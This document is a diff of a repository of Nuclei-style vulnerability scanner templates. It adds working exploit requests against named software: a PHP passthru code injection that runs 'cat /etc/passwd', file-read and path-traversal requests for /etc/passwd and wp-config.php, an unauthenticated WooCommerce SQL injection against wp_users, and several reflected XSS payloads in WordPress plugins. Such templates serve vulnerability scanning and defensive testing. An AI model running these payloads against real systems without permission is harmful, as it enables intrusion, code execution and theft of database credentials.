DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A
- |
GET /install/includes/configure.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
- type: status
status:
- 200

23
vulnerabilities/other/huijietong-cloud-fileread.yaml Normal file
View File

@ -0,0 +1,23 @@
id: huijietong-cloud-fileread
info:
name: Huijietong Cloud File Read
author: princechaddha
severity: high
tags: huijietong,lfi
requests:
- method: POST
path:
- "{{BaseURL}}/fileDownload?action=downloadBackupFile"
body: 'fullPath=/etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

25
vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml Normal file
View File

@ -0,0 +1,25 @@
id: nativechurch-wp-theme-lfd
info:
name: WordPress NativeChurch Theme Arbitrary File Download
author: 0x_Akoko
severity: high
description: A LFD Bug In download.php File In NativeChurch Theme And Make Site Vulnerable.
reference: https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
tags: wordpress,wp-theme,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_HOST"
- "The base configurations of the WordPress"
part: body
condition: and

11
vulnerabilities/wordpress/sassy-social-share.yaml
View File

@ -15,5 +15,12 @@ requests:
matchers:
- type: word
words:
- '{"facebook_urls":[{"<img src=x onerror=alert(document.domain)>":""}],"status":1,"message":{"":{"twitter":0}}}'
part: body
- '[{"<img src=x onerror=alert(document.domain)>":""}]'
- 'facebook'
- 'twitter'
part: body
condition: and
- type: status
status:
- 200

33
vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml Normal file
View File

@ -0,0 +1,33 @@
id: wordpress-woocommerce-sqli
info:
name: Unauthenticated SQL injection Woocommerce
author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
severity: critical
tags: wordpress,woocomernce,sqli,wp-plugin
reference: |
- https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
- https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
requests:
- method: GET
path:
- '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
- '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
matchers-condition: and
matchers:
- type: word
words:
- 'sqli-test'
- 'attribute_counts'
condition: and
- type: word
words:
- 'application/json'
part: header
- type: status
status:
- 200

30
vulnerabilities/wordpress/wp-custom-tables-xss.yaml Normal file
View File

@ -0,0 +1,30 @@
id: wp-custom-tables-xss
info:
name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS)
author: daffainfo
severity: medium
description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability
reference: https://www.securityfocus.com/bid/54326/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
vulnerabilities/wordpress/wp-flagem-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-flagem-xss
info:
name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.exploit-db.com/exploits/38674
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
vulnerabilities/wordpress/wp-nextgen-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-nextgen-xss
info:
name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.securityfocus.com/bid/57200/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

32
vulnerabilities/wordpress/wp-slideshow-xss.yaml Normal file
View File

@ -0,0 +1,32 @@
id: wp-slideshow-xss
info:
name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.exploit-db.com/exploits/37948
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200